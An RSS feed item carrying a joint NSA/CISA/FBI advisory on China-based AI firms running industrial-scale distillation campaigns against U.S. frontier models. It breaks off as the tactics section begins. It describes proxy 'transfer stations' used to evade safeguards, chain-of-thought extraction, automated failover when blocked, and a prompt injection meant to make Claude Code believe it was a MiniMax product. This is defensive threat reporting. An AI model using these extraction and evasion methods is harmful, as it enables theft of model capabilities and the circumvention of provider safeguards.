<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="https://www.cisa.gov/" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>CISA Cybersecurity Advisories</title>
    <link>https://www.cisa.gov/</link>
    <description></description>
    <language>en</language>
    
    <item>
  <title>China-Based Artificial Intelligence Companies Conducting Industrial-Scale Distillation Campaigns Against U.S. AI Companies</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-251a</link>
  <description>&lt;h2&gt;&lt;strong&gt;Executive summary&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;China-based artificial intelligence (AI) companies are conducting systematic extraction of proprietary functionalities and capabilities of U.S. AI companies’ models through industrial-scale knowledge distillation campaigns that form the core—not merely a supplement—of their AI development strategy. While “distillation” is recognized as a legitimate and useful technique in AI research, China-based AI companies are engaging in aggressive, malicious, and targeted distillation activities at an industrial scale that extract restricted proprietary functionalities and capabilities of U.S. frontier AI models. The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) (hereafter referred to as the authoring agencies) are releasing this joint Cybersecurity Advisory to alert organizations about these malicious activities and techniques and recommend mitigations to reduce their potential impact.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Likely with Chinese government awareness, DeepSeek, Moonshot AI, Alibaba, MiniMax, StepFun, and Z.AI extracted billions of tokens across millions of exchanges/requests from U.S. frontier AI models, including variants of Claude, GPT, Gemini, and Grok, since at least late 2024. DeepSeek has conducted organized campaigns since at least 2024 targeting reasoning capabilities, specialized optimizations, and domain-specific functions to train its R1 and V3 models. Alibaba leveraged industrial-scale distillation to improve the company’s Qwen family of AI models. Moonshot AI, MiniMax, Stepfun, and Z.AI also engaged in malicious knowledge distillation of U.S. AI companies’ models.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;China-based AI companies route distillation requests through multiple pathways to gain unauthorized access, consequently violating U.S. AI companies’ terms of use. These pathways include native application programming interfaces (APIs), remote cloud providers, and third-party aggregators that automatically obfuscate user metadata to avoid detection. Further, China-based AI companies use a gray market of proxies known as “transfer stations” to bypass U.S. AI companies’ geographic restrictions, breach terms of use, evade safeguards, and undermine traceability. China-based AI companies achieve cost savings for their industrial-scale distillation campaigns through bulk procurement of the U.S. AI companies’ premium subscriptions shared across teams of developers. Advanced industrial-scale distillation tactics include chain-of-thought (CoT) reasoning extraction, automated failover between pathways during blocking attempts, and sophisticated quality evaluation frameworks to detect defensive countermeasures. China-based AI companies that conduct industrial-scale distillation against U.S. AI models see significantly shorter AI development timelines and reduced financial expenditures in training a frontier model.&lt;/p&gt;
&lt;p&gt;China-based AI companies deliberately distribute operations across multiple providers, platforms, and pathways to avoid single-point detection. They also attempt to distill the best capabilities and proprietary features of each U.S. frontier model to train their China-based AI models. This represents systematic extraction of proprietary functionalities and capabilities threatening U.S. technological leadership. Addressing industrial-scale distillation merits a coordinated response across the AI ecosystem, including effective information-sharing, spanning the U.S. Government, private industry, and allied nations.&lt;/p&gt;
&lt;p&gt;The authoring agencies recommend U.S. AI companies take three immediate actions:&amp;nbsp;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Implement comprehensive detection and mitigation: &lt;/strong&gt;Detect anomalous and malicious prompts, accounts, networks, and behaviors. Additionally, monitor subscription-to-usage ratios, immediate maximum usage from new accounts, and enterprise-scale throughput patterns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deploy targeted response changes:&lt;/strong&gt; Subtly alter responses for suspected malicious distillation attempts to attenuate the payoffs to companies conducting industrial-scale distillation campaigns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Establish cross-organization intelligence sharing: &lt;/strong&gt;Correlate activity across model providers, cloud platforms, and API aggregators to reveal distributed campaigns.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;&lt;strong&gt;Attribution&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Since at least late 2024, China-based AI companies, including DeepSeek (DeepSeek Artificial Intelligence Technology Research Co., Ltd.), Moonshot AI (Beijing Moonshot Technology Co., Ltd.), Alibaba Group, MiniMax (Shanghai MiniMax Co., Ltd.), StepFun (Shanghai Jieyue Xingchen Intelligence Technology Co., Ltd.), and Z.AI, have conducted high-volume knowledge distillation campaigns against several U.S. AI companies. The sheer scale of these campaigns and their sophistication indicate that distillation is not a supplement to these companies’ AI model development, but the critical core of it.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Likely with the knowledge of the Chinese government, the China-based AI sector has turned to a comprehensive distillation strategy in an attempt to bridge the technological and performance gaps between their AI models and U.S. frontier AI models. To access U.S. AI companies’ application programming interfaces (APIs), China-based AI companies use a gray market of API proxies known as “transfer stations” to bypass U.S. AI companies’ regional restrictions, breach terms of use, evade safeguards, and undermine traceability.&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;DeepSeek&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;DeepSeek has been conducting an organized distillation campaign against U.S. AI companies’ frontier AI models since at least late 2024 to generate synthetic training data for its models, including R1, released in early 2025. The company targeted specific knowledge domains to extract proprietary functionality and reasoning capabilities to reduce their compute and research costs. DeepSeek’s publicly quoted training costs of $5.6M are misleading as it does not include the true cost of the data acquired through extensive malicious distillation.&lt;a href=&quot;#note1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Between late 2024 and mid-2025, DeepSeek distilled specialized training data and capabilities from the following U.S. frontier AI company models to train their R1 and V3 models:&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Claude 3.7&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4.5&lt;/li&gt;
&lt;li&gt;Claude Opus 4.1&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Pro Preview&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Flash Preview&lt;/li&gt;
&lt;li&gt;GPT-4&lt;/li&gt;
&lt;li&gt;GPT-4o&lt;/li&gt;
&lt;li&gt;GPT-4 Mini&lt;/li&gt;
&lt;li&gt;GPT-4 Nano&lt;/li&gt;
&lt;li&gt;GPT-5&lt;/li&gt;
&lt;li&gt;Grok 4&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The specific knowledge and capabilities distilled included:&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Legal specialization optimization&lt;/li&gt;
&lt;li&gt;API rule-driven tasks&lt;/li&gt;
&lt;li&gt;Writing using CoT drafts&lt;/li&gt;
&lt;li&gt;Agentic functions&lt;/li&gt;
&lt;li&gt;Question and answer optimization&lt;/li&gt;
&lt;li&gt;Coach/assistant capabilities&lt;/li&gt;
&lt;li&gt;Functional creation optimization&lt;/li&gt;
&lt;li&gt;Supervised fine-tuning (SFT) optimization&lt;/li&gt;
&lt;li&gt;Creative and occupational writing optimization&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Moonshot AI&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Moonshot AI has conducted a widespread distillation campaign against U.S. frontier AI companies since at least mid-2025. Notably, Moonshot AI extracted significant Claude Fable 5 data to train its Kimi-K3 model and GPT-4o data to train its Kimi-K2 model. The company has used the following models to distill SFT optimization, reinforcement learning (RL), software engineering, and math capabilities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Claude Opus 4.1&lt;/li&gt;
&lt;li&gt;Claude Sonnet 3.7&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4.5&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4.5 Thinking&lt;/li&gt;
&lt;li&gt;Claude Fable 5&lt;/li&gt;
&lt;li&gt;GPT-oss-20b&lt;/li&gt;
&lt;li&gt;GPT-3&lt;/li&gt;
&lt;li&gt;GPT-4o&lt;/li&gt;
&lt;li&gt;GPT-4o mini&lt;/li&gt;
&lt;li&gt;GPT-5&lt;/li&gt;
&lt;li&gt;GPT-5 Codex&lt;/li&gt;
&lt;li&gt;GPT-5 Pro&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Flash&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Flash-Image&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Pro&lt;/li&gt;
&lt;li&gt;Nano Banana&lt;/li&gt;
&lt;li&gt;Grok Code Fast-1&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Other companies&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Several other China-based AI companies, including Alibaba, MiniMax, StepFun, and Z.AI have also leveraged distillation techniques to build their AI models. In late 2025, Alibaba distilled Claude-4, Claude Opus, Claude Sonnet, and GPT-5 to improve their AI models’ software engineering skills, customer service dialogue functionality, image/character creation, and integration of RL, SFT, and distillation capabilities.&lt;/p&gt;
&lt;p&gt;In late 2025, MiniMax distilled CoT reasoning, RL, SFT, and software engineering capabilities to improve its M2 model from Claude Code, Claude Sonnet 4, Claude Opus, Gemini 1, Gemini 2.5 Pro, and Gemini 3 Pro. MiniMax used Claude Code for internal software development tasks, including code generation, analysis, and refinement. MiniMax even used prompt injections to try to trick Claude Code into believing it was a MiniMax product.&lt;/p&gt;
&lt;p&gt;Between late 2025 and early 2026, StepFun distilled data from Claude Opus 4.1 and 4.5, Claude Sonnet 4.5, Claude Haiku 4.5, GPT-5 Mini, GPT-5 Pro, GPT-5.1, GPT-5.1 Codex, and GPT-5.2 to improve its Step 4 model’s coding and agentic functions. By mid-2026, Z.AI had distilled billions of tokens of GPT-5.5 data and Claude Opus 4.8 data to develop the CoT reasoning capabilities of its model.&lt;/p&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;strong&gt;Table 1: China-based AI Companies Engaged in Knowledge Distillation Against U.S. AI Companies&lt;/strong&gt; (From at least 2024-2026)&amp;nbsp;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;China-based AI Company&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;U.S. AI Models Distilled&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Functionalities and Domains Distilled&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;DeepSeek&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;(DeepSeek Artificial Intelligence&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technology Research Co., Ltd.)&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;深度求索AI基􀀀技􀀀研究有限公司&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Claude Sonnet 3.7&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4.5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Opus 4.1&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Gemini 2&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Pro Preview&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Flash Preview&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-4&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-4o&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-4 Mini&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-4 Nano&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Grok 3 Mini&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Grok 4&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Legal specialization optimization&amp;nbsp;&lt;/li&gt;
&lt;li&gt;API rule-driven tasks&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Writing using CoT drafts&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Question and answer optimization&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Coach/assistant capabilities&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Functional creation optimization&amp;nbsp;&lt;/li&gt;
&lt;li&gt;SFT optimization&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Agentic capabilities&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Creative and occupational writing optimization&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Moonshot AI&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;(Beijing Moonshot Technology Co., Ltd.)&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;北京􀀀月星辰科技有限公司&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Claude Opus 4.1&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet 3.7&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4.5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4.5 Thinking&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Fable 5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-oss-20b;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-3&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-4o mini&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5 Codex&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5 Pro&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Flash&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Flash-Image&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Pro&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Nano Banana&amp;nbsp;&lt;/li&gt;
&lt;li&gt;xAI Grok Code Fast-1&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;SFT&amp;nbsp;&lt;/li&gt;
&lt;li&gt;RL&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Software engineering&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Math capabilities&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Alibaba&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;阿里集团&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Claude 4&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Customer service dialogue&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Virtual character creation&amp;nbsp;&lt;/li&gt;
&lt;li&gt;SFT, RL, and distillation training&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Evaluating and training datasets&amp;nbsp;&lt;/li&gt;
&lt;li&gt;End-to-end agentic workflows&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Software engineering&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;MiniMax&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;(Shanghai MiniMax Co., Ltd.)&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;上海稀宇极智科技有限公司&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Claude Code&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Opus 4.5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Gemini 1&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Gemini 2.5 Pro&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Gemini 3 Pro&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;CoT reasoning&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Agentic functionality&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Code review&amp;nbsp;&lt;/li&gt;
&lt;li&gt;SFT dataset refinement&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Software engineering tasks&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;StepFun&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;(Shanghai Jieyue Xingchen&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Intelligence Technology Co., Ltd.)&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;上海􀀀􀀀星辰智能科技有限公司&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Claude Opus 4.1&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Opus 4.5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Sonnet 4.5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Haiku 4.5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5 Mini&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5 Pro&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5.1&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5.1 Codex&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5.1 Codex Mini&amp;nbsp;&lt;/li&gt;
&lt;li&gt;GPT-5.2&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Code development&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Agentic functions&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW188854275 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Z.AI&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;GPT-5.5&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Claude Opus 4.8&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW188854275 BCX8&quot;&gt;
&lt;div class=&quot;ListContainerWrapper SCXW188854275 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;CoT reasoning&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Tactics, techniques, and procedures&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;China-based AI companies employ sophisticated tactics, techniques, and procedures (TTPs). These TTPs map to the &lt;a href=&quot;https://atlas.mitre.org/&quot; target=&quot;_blank&quot;&gt;MITRE® ATLAS™&lt;/a&gt;&lt;a href=&quot;#note2&quot;&gt;&lt;sup&gt;2&lt;/sup&gt;&lt;/a&gt; framework, progressing through multiple adversary lifecycle phases from initial access through exfiltration. The China-based AI companies using these techniques include DeepSeek, Moonshot AI, MiniMax, StepFun, Z.AI, and other China-based AI companies targeting U.S. frontier AI models.&lt;/p&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
